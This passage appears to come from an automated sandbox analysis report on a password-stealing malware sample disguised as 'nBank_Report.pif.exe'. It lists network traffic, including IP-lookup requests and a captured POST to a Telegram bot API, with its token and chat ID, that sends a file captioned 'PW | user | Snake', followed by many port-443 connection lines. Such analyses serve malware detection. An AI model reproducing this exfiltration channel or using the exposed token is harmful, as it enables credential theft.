              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcdea6f6d70bdcHost: api.telegram.orgContent-Length: 546Connection: Keep-Alive
              Source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002966000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
              Source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A2F000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.000000000295A000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002966000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000029A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: nBank_Report.pif.exe, 00000000.00000002.1478197237.000000000402D000.00000004.00000800.00020000.00000000.sdmp, nBank_Report.pif.exe, 00000000.00000002.1478197237.0000000004995000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1712790952.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: nBank_Report.pif.exe, 00000008.00000002.3881606096.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, nBank_Report.pif.exe, 00000008.00000002.3882678139.0000000006379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
              Source: nBank_Report.pif.exe, 00000008.00000002.3882678139.0000000006379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/#
              Source: nBank_Report.pif.exe, 00000008.00000002.3882678139.0000000006379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/$
              Source: nBank_Report.pif.exe, 00000008.00000002.3865233133.0000000000CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: nBank_Report.pif.exe, 00000008.00000002.3882678139.00000000062F0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: nBank_Report.pif.exe, 00000008.00000002.3882678139.00000000062F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab2
              Source: nBank_Report.pif.exe, 00000008.00000002.3865233133.0000000000CBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ee3e174453648
              Source: nBank_Report.pif.exe, 00000008.00000002.3892798514.0000000008AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oen
              Source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.000000000297E000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
              Source: nBank_Report.pif.exe, 00000000.00000002.1477487756.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000A.00000002.1543026809.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000028A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002B0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: nBank_Report.pif.exe, 00000008.00000002.3882678139.00000000062F0000.00000004.00000020.00020000.00000000.sdmp, nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394
              Source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002966000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000029A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: nBank_Report.pif.exe, 00000000.00000002.1478197237.000000000402D000.00000004.00000800.00020000.00000000.sdmp, nBank_Report.pif.exe, 00000000.00000002.1478197237.0000000004995000.00000004.00000800.00020000.00000000.sdmp, nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1712790952.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000029A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
              Source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000029A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
              Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
              Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
